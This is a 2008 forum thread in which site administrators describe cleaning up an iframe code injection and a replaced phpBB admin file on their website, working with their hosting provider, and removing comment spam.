LITTLEBLACKDOG.COM

Posted: Sun Jan 06, 2008 2:38 pm Post subject: LWD malwared?

anyone else having issues with LWD redirecting to a TON (I can't count it cause it locks up CPU at 100% usage in firefox/IE/AFB (any f'n browser) and never finishes loading) of redirects... mainly to some .ar domain?

my DNS is clean... just checked... everything that I have redirects for is mainly the spybot S&D redirect to localhost for bad domains list and localhost. Looks like LWD may have been victim of sql injection or some such nonsense (since I'm not versed on attack stuffs... I dunno what exactly to call it)

Posted: Sun Jan 06, 2008 3:39 pm Post subject:

Code injection on the root directory. Kind of primitive. I fixed the php code (basically they added 3 IFRAME tags to some argentina site). Downloading logs to figure out who dunnit and how, so we can lock the open window.

Also banned some guy playing comment games from Cap Gemini India.
I SHOULD report the bastard, but probably not worth it.

Posted: Mon Jan 07, 2008 4:35 am Post subject:

I got a call (at work) from Lunarpages today regarding this. Apparently the 45 core dumps I saw in LWD's public_html directory had made some folks at Lunarpages notice, and they disabled a script over there. Funny as it's a script we don't use, and it's zero bytes since 2004 anyway, so it's something Fido already commented out. Which could be bad anyway.

Upshot is, Lunarpages opened a ticket on this. After some back and forth, I apparently now have got the ticket escalated to their technical staff "for review". In any case, the site is working, for the time being, and I'm paying attention to it. Which may mean you'll get more news there. The whole episode has made me start thinking about LWD again.

Posted: Mon Jan 07, 2008 12:38 pm Post subject:

That mean I can stop scouring the log files looking for anything suspicious?!?!?

Posted: Mon Jan 07, 2008 1:36 pm Post subject:

Go back to sleep, Tyme. Smile

It was the phpBB code we don't use over there that got us cracked. I deleted it, we don't use it and never will now.

Same hack that got us here, actually.

Posted: Mon Jan 07, 2008 1:49 pm Post subject:

So yeah, we got hacked by a piece of code we don't use, and had shut off via modules.php, which has been turning away legions of Russian hackers trying to substitute our phpNuke working area with theirs, and then some dink from Germany pops in, goes straight to our admin_db_utilities.php and replaces it. Within minutes, at least 8 others show up to try the same thing. One thing the script kiddies do, is they got a network.

Truth be told, they were pretty good to us. They were more cruel to the server, which was why Lunarpages got interested this time. They crashed the server a bunch of times on Saturday, which got traced to the now-screwed admin_db_utilities.php file, and then Lunarpages locked it. I've told them to leave it locked for now.

I also cleaned out another 250 comment spams left in the polls. I checked our referrer list, it doesn't seem to be cross linking too much porn content so I think we'll come out of it, but I'm just getting sick of this. After getting hit with about 13,000 script generated spam links in our comment database I'm pretty much ready to extract the data out myself and make static pages.